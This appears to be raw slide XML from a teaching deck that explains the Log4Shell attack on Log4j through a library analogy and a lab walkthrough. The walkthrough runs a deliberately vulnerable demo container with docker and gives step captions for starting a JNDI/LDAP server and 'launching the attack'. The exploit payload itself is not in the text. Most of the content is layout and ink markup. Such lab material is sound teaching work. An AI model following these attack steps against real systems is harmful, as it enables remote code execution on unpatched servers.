          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{464401FB-7071-45B3-A233-CE5F026F15BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2850512" y="1094704"/>
            <a:ext cx="3226140" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Download and unzip JNDI server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251856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9476-29B8-7DF3-B98C-022B0A659AA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Log4Shell attack explained</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08F7FDB9-23C3-FA29-AD53-DEFB6FF6F0C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A person named “Log4j” prints messages (like a book) about what's happening in a computer program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>book == resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>all books are saved in a library == Lightweight Directory Access Protocol (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>“Log4j” uses a library </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>catalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (the librarian's list) to look up specific books in a library.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>library </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>catalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> == Java Naming and Directory Interface (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>An attacker tricks “Log4j” into looking for a specific "book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>“ (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> lookup) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>in the library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Attackers tamper with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>catalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to lead Log4j to a malicious "book“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The book (code) is controlled by the attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When “Log4j” follows this tampered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>catalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> entry (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> lookup), it executes the malicious code inside the "book" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>leading to unauthorized access and control of the computer system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3745973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12D91-1BB6-6634-DEE2-BB1D3DE95B95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="65955"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="786167" y="4626367"/>
            <a:ext cx="10619666" cy="981954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C95933F-3E2A-F09B-111D-0ACF6A870B7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="887767" y="1369126"/>
            <a:ext cx="4237087" cy="2484335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EDF0F4B-7036-DD71-57AD-15E765F51B70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="887767" y="972135"/>
            <a:ext cx="2299669" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check LDAP server’s IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{609BE877-0F68-0160-AD43-24F80077449E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786167" y="4255596"/>
            <a:ext cx="2178866" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start the LDAP server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156905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3339-A03E-5714-6354-C906316F75DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>3. Attack machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C480097D-976A-F95F-7A03-5170B2495F95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Make sure both the container and the JNDI server are running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Let’s launch the attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333316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AD9C20-999A-C19E-2150-0192A7826264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="334780" y="708424"/>
            <a:ext cx="11522439" cy="5441152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC8E5FAC-FD1D-3ECD-182C-BEEF265DDED8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5629660" y="1149784"/>
            <a:ext cx="6172200" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>christophetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84CC6E10-C9BD-DE40-A7A4-96F9A11768FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379642" y="4821028"/>
            <a:ext cx="9461436" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Using curl  to send a HTTP request to the victim and observe that the container receives the request</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DDAAB5C-1DCD-52D9-1C91-AE7EE07CAD3A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="283480" y="3524280"/>
              <a:ext cx="11453040" cy="906840"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DDAAB5C-1DCD-52D9-1C91-AE7EE07CAD3A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="247480" y="3488280"/>
                <a:ext cx="11524680" cy="978480"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01CF10B2-419E-71AA-28D5-97D6A987C72E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8803960" y="3950160"/>
            <a:ext cx="624600" cy="693000"/>
            <a:chOff x="8803960" y="3950160"/>
            <a:chExt cx="624600" cy="69300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84CEB0F-12FB-1828-80A1-BF1CF22DD6D7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8803960" y="3950160"/>
                <a:ext cx="624600" cy="693000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="6" name="Ink 5">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C84CEB0F-12FB-1828-80A1-BF1CF22DD6D7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8767960" y="3914160"/>
                  <a:ext cx="6962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AAE7CEB-56B1-7DAF-4AA0-5F1F486D0F87}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9113200" y="3955560"/>
                <a:ext cx="223920" cy="37440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="7" name="Ink 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AAE7CEB-56B1-7DAF-4AA0-5F1F486D0F87}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9077142" y="3919560"/>
                  <a:ext cx="295675" cy="10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BA8673B-945D-4F6A-FAE5-9EE8E1C67C6E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3068080" y="324960"/>
              <a:ext cx="221760" cy="557280"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="9" name="Ink 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBA8673B-945D-4F6A-FAE5-9EE8E1C67C6E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId11"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3032080" y="288937"/>
                <a:ext cx="293400" cy="62896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40B67FE-2740-2816-9FC6-8A2F2B39E20B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3139360" y="763440"/>
              <a:ext cx="297000" cy="214920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="10" name="Ink 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{040B67FE-2740-2816-9FC6-8A2F2B39E20B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId13"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3103360" y="727440"/>
                <a:ext cx="368640" cy="286560"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98ACAEB4-94A8-E711-3329-5AB3891B1CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3727240" y="111480"/>
            <a:ext cx="3326040" cy="529560"/>
            <a:chOff x="3727240" y="111480"/>
            <a:chExt cx="3326040" cy="529560"/>
          </a:xfrm>
        </p:grpSpPr>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CECD0AEF-5D1D-80F3-7E8E-BA77C8002160}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3727240" y="365280"/>
                <a:ext cx="255600" cy="275760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="12" name="Ink 11">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CECD0AEF-5D1D-80F3-7E8E-BA77C8002160}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId15"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3691291" y="329280"/>
                  <a:ext cx="327139"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92CF825-2259-3B5C-D6B2-ACDC867FFBB1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4154920" y="355200"/>
                <a:ext cx="205560" cy="236160"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="13" name="Ink 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A92CF825-2259-3B5C-D6B2-ACDC867FFBB1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId17"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4118920" y="319200"/>
                  <a:ext cx="277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C8360D0-F070-AC75-B614-89ECBC4D4FAB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4531120" y="324960"/>
                <a:ext cx="278280" cy="239400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="14" name="Ink 13">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C8360D0-F070-AC75-B614-89ECBC4D4FAB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId19"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4495120" y="288960"/>
                  <a:ext cx="3499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C906588C-08DC-F28C-0D07-A1C197D86467}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5110360" y="131640"/>
                <a:ext cx="49320" cy="408960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16" name="Ink 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C906588C-08DC-F28C-0D07-A1C197D86467}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId21"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5074621" y="95672"/>
                  <a:ext cx="120441" cy="48053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0E63A1DD-804E-0B22-82D9-EC57E64E151B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4886440" y="283560"/>
                <a:ext cx="366480" cy="20880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
